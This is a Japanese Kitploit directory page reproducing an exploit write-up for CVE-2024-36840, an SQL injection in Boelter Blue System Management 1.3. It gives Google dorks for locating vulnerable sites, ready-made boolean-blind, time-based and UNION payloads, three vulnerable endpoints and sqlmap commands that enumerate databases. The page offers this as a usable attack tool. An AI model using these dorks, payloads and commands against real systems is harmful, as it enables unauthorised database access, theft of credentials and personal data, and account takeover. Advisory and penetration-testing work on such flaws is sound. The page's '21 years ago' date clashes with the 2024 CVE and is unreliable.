Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-36840-Exploit — # エクスプロイト対象: CVE-2024-36840: Boelter Blue System Management (バージョン 1.3) におけるSQLインジェクションの脆弱性 | Kitploit
ツール/GitHubGitHub/theexploiters/cve-2024-36840-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# エクスプロイト対象: CVE-2024-36840: Boelter Blue System Management (バージョン 1.3) におけるSQLインジェクションの脆弱性

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-36840: Boelter Blue System Management(バージョン1.3)におけるSQLインジェクションの脆弱性

エクスプロイトの詳細

  • エクスプロイトタイトル: Boelter Blue System Management(バージョン1.3)におけるSQLインジェクションの脆弱性

  • 元のGoogle Dork: inurl:"Powered by Boelter Blue"(動作しませんでした(検索結果にURLがゼロ件))

  • TheexploitersによるGoogle Dork: intext:"Powered by Boelter Blue"(動作します)

  • 日付: 2024-06-04

  • エクスプロイト作成者: CBKB (DeadlyData, R4d1x)

  • ベンダーホームページ: Boelter Blue

  • ソフトウェアリンク: Google Play Store

  • バージョン: 1.3

  • テスト環境: Linux Debian 9 (stretch)、Apache 2.4.25、MySQL >= 5.0.12

  • CVE: CVE-2024-36840

脆弱性の説明

Boelter Blue System Management(バージョン1.3)において、複数のSQLインジェクションの脆弱性が確認されています。これらの脆弱性により、攻撃者は様々なパラメータを通じて任意のSQLコマンドを注入・実行することが可能です。悪用に成功した場合、不正アクセス、データの外部流出、およびアカウント乗っ取りの可能性が生じます。

影響を受けるパラメータとエクスプロイトの詳細:

  1. パラメータ: id (GET)

    • タイプ: ブールベースのブラインド
    • ペイロード: id=10071 AND 4036=4036
  2. タイプ: 時間ベースのブラインド

    • ペイロード: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. タイプ: UNIONクエリ

    • ペイロード: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

脆弱なエンドポイント

  1. news_details.php?id

    • 例: https://www.example.com/news_details.php?id=10071
    • 悪用方法:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • 例: https://www.example.com/services.php?section=5081
    • 悪用方法:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • 例: https://www.example.com/location_details.php?id=836
    • 悪用方法:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

影響

  • 不正なデータベースアクセス: 悪用によりデータベースへの不正アクセスが可能となり、攻撃者が機密情報を抽出できる可能性があります。
  • データ漏洩: 管理者認証情報、ユーザーの個人情報、購入履歴などの機密データが侵害される可能性があります。
  • アカウント乗っ取り: 攻撃者がユーザーアカウントを乗っ取る可能性があります。
  • 完全な制御: 影響を受けるアプリケーションの完全な制御が可能となり、深刻なセキュリティ上の影響が生じます。

クレジット

  • 発見者: CBKB (DeadlyData, R4d1x)

参考情報

  • CyberDepot脆弱性レポート
  • CVE-2024-36840

Repo View Counter

ツールをダウンロード